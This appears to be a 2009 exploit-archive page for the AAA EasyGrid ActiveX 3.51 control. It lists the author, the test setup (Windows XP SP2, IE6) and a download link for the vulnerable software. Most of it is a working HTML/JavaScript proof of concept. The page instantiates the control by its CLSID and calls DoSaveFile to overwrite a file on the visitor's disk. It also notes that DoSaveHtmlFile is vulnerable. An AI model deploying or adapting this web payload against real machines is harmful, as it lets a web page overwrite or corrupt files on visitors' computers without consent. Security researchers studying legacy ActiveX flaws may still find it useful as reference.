AAA EasyGrid ActiveX 3.51 Remote File Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AAA EasyGrid ActiveX 3.51 Remote File Overwrite Exploit
# Published : 2009-01-14
# Author : Houssamix
# Previous Title : Excel Viewer OCX 3.2 Remote File Execution Exploit
# Next Title : Oracle Secure Backup 10g exec_qr() Command Injection Vulnerability

=======================================================================================<br>
Author: Houssamix								       <br>
=======================================================================================<br>
- Viva Gazza - Viva Palestine - 						       <br>
AAA EasyGrid ActiveX  v 3.51 Remote File Overwrite exploit			       <br>
Download : http://www.share2.com/easygrid/download.htm		 		       <br>

 Tested on Windows XP Professional SP2 , with Internet Explorer 6		       <br>

Note : DoSaveHtmlFile() is vuln to , it well overwitten the file with some html code   <br>
=======================================================================================<br>
<HTML>
<BODY>
 <object id=hsmx classid="clsid:{DD44C0EA-B2CF-31D1-8DD3-444553540000}"></object>

<SCRIPT>

function hehe()
 {
     File = "c:\hsmx.txt"
   hsmx.DoSaveFile(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>
=======================================================================================

# www.Syue.com [2009-01-14]